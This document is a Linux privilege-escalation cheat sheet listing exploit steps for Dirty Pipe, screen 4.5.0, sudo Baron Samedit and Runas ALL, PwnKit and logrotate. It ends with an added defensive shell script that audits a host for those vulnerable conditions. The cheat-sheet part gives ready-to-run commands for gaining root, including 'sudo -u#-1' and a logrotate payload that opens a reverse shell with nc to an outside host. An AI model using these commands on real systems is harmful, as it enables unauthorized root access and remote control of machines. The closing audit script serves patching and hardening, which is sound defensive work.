Linux
Dirty Pipe
Exploit for kernels 5.8 to 5.17
sudo apt-get install gcc
chmod +x compile.sh
./compile.sh
./exploit-1
# change the root password in the /etc/passwd file and get an elevated shell.
Screen 4.5.0
chmod +x 41154.sh
./41154.sh
Sudo - Baron Samedit
Exploit sudo 1.8.21 | 1.8.31 | 1.8.27 | 1.9.2 | other
Sudo - Runas ALL
Exploit sudo < 1.8.28
Exploiting the bug requires that the user have sudo privileges that allow them to run commands with an arbitrary user ID. Typically, this means that the user's sudoers entry has the special value ALL in the Runas specifier.
e.g. alice myhost = (ALL) /usr/bin/id
If a sudoers entry is written to allow the user to run a command as any user except root, the bug can be used to avoid this restriction.
e.g. bob myhost = (ALL, !root) /usr/bin/vi
sudo -u#-1 vi
sudo -u#4294967295 vi
PwnKit - Polkit
Exploit1 / Exploit2 Polkit < 0.105-26
pkexec --version
gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
./cve-2021-4034-poc
Logrotate
Exploit Logrotate 3.8.6 | 3.11.0 | 3.15.0 | 3.18.0
Find log files that logrotate processes and that you have write permission on, then run the exploit against that writable log file.
gcc -o logrotten logrotten.c
Prepare the payload (the backticks must be escaped so that `id -u` runs when the payload executes, not when the file is written):
echo "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &); fi" > payloadfile
If the "create" option is set in logrotate.cfg:
./logrotten -p ./payloadfile /tmp/log/pwnme.log
If the "compress" option is set in logrotate.cfg:
./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log
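The following POSIX shell script is an added, defender-side example; it is not code from this cheat sheet or from any of the exploits it lists. It takes the conditions named in the Dirty Pipe, Sudo - Runas ALL, PwnKit and Logrotate sections above (kernel 5.8 to 5.17, sudo below 1.8.28 together with "(ALL, !root)" sudoers entries, polkit below 0.105-26, and rotated log files that unprivileged users can write) and reports which of them hold on the local host so they can be patched or fixed. All function names (audit_host, version_lt, find_runas_exclusions, logrotate_log_paths and the rest) are chosen here, the sample sudoers text is constructed, versions are compared numerically field by field, and the kernel range is the coarse one stated on this page rather than the exact fixed patch levels.

```shell
#!/bin/sh
# Defender-side audit helper added here as an example; it is not part of the
# original cheat sheet or of any exploit it lists. It reports which of the
# vulnerable conditions named above apply to the local host so they can be
# fixed. Assumptions: versions compare numerically field by field after
# non-digits are turned into separators ("1.8.27p1" -> 1.8.27.1,
# "5.15.0-91-generic" -> 5.15.0.91); the kernel range is the coarse
# "5.8 to 5.17" stated on the page, not the exact fixed patch levels.

# norm_version V : rewrite V as dot-separated numeric fields only.
norm_version() {
    printf '%s\n' "$1" | sed -e 's/[^0-9]\{1,\}/./g' -e 's/^\.//' -e 's/\.$//'
}

# version_lt A B : exit 0 when A < B; missing trailing fields count as 0.
version_lt() {
    a=$(norm_version "$1"); b=$(norm_version "$2"); i=1
    while :; do
        fa=$(printf '%s\n' "$a" | awk -F. -v n="$i" '{print $n}')
        fb=$(printf '%s\n' "$b" | awk -F. -v n="$i" '{print $n}')
        if [ -z "$fa" ] && [ -z "$fb" ]; then return 1; fi   # all fields equal
        fa=${fa:-0}; fb=${fb:-0}
        [ "$fa" -lt "$fb" ] && return 0
        [ "$fa" -gt "$fb" ] && return 1
        i=$((i + 1))
    done
}

# in_range V LO HI : exit 0 when LO <= V <= HI.
in_range() { ! version_lt "$1" "$2" && ! version_lt "$3" "$1"; }

# Version checks for the ranges this page lists; each exits 0 when vulnerable.
check_dirty_pipe()     { in_range "$1" 5.8 5.17; }      # kernel release
check_sudo_runas_all() { version_lt "$1" 1.8.28; }     # sudo version
check_pwnkit()         { version_lt "$1" 0.105-26; }   # pkexec/polkit version

# find_runas_exclusions : print non-comment sudoers entries (stdin) whose
# Runas specifier has the "(ALL, !root)" shape; exit 0 if any were found.
find_runas_exclusions() {
    grep -v '^[[:space:]]*#' | grep -E '\(ALL[^)]*!root[^)]*\)'
}

# logrotate_log_paths : print the log paths that logrotate config text (stdin)
# rotates, i.e. the tokens on lines that open a "{" block; globs stay unexpanded.
logrotate_log_paths() {
    grep -v '^[[:space:]]*#' | awk '/[{][[:space:]]*$/ { for (i = 1; i < NF; i++) print $i }'
}

# world_writable_paths : of the paths on stdin, print those that others can write.
world_writable_paths() {
    while read -r p; do
        for f in $p; do                       # expands globs from the config
            [ -e "$f" ] && find "$f" -prune -perm -002 -print
        done
    done
    return 0
}

# Constructed sample sudoers text (not from any real host), used for testing.
sample_sudoers() {
    printf '%s\n' '# old: carol myhost = (ALL, !root) /bin/sh' \
                  'alice myhost = (ALL) /usr/bin/id' \
                  'bob myhost = (ALL, !root) /usr/bin/vi'
}

# audit_host : run every check against this machine and print the findings.
audit_host() {
    k=$(uname -r)
    check_dirty_pipe "$k" && echo "kernel $k: inside the Dirty Pipe range; patch it"
    if command -v sudo >/dev/null 2>&1; then
        s=$(sudo -V 2>/dev/null | awk 'NR == 1 {print $3}')
        check_sudo_runas_all "$s" && echo "sudo $s: below 1.8.28 (Runas ALL bug); patch it"
    fi
    if command -v pkexec >/dev/null 2>&1; then
        # pkexec prints only the upstream version; confirm the distro package revision too.
        p=$(pkexec --version 2>/dev/null | awk '{print $3}')
        check_pwnkit "$p" && echo "pkexec $p: below 0.105-26 (PwnKit); patch it"
    fi
    [ -r /etc/sudoers ] && find_runas_exclusions </etc/sudoers |
        sed 's/^/sudoers Runas exclusion (bypassable on sudo < 1.8.28): /'
    cat /etc/logrotate.conf /etc/logrotate.d/* 2>/dev/null |
        logrotate_log_paths | world_writable_paths | sed 's/^/world-writable rotated log: /'
    return 0
}

# Runs against the local host only when asked: AUDIT_RUN=1 sh audit.sh
if [ "${AUDIT_RUN:-0}" = 1 ]; then audit_host; fi
```

The version comparison deliberately treats "1.8.28" and "1.8.28p1" as not below 1.8.28, so a patched point release is not flagged; pkexec, on the other hand, only prints the upstream version, so on Debian-style systems the package revision (the "-26" part) has to be confirmed from the package manager before trusting a PwnKit finding either way.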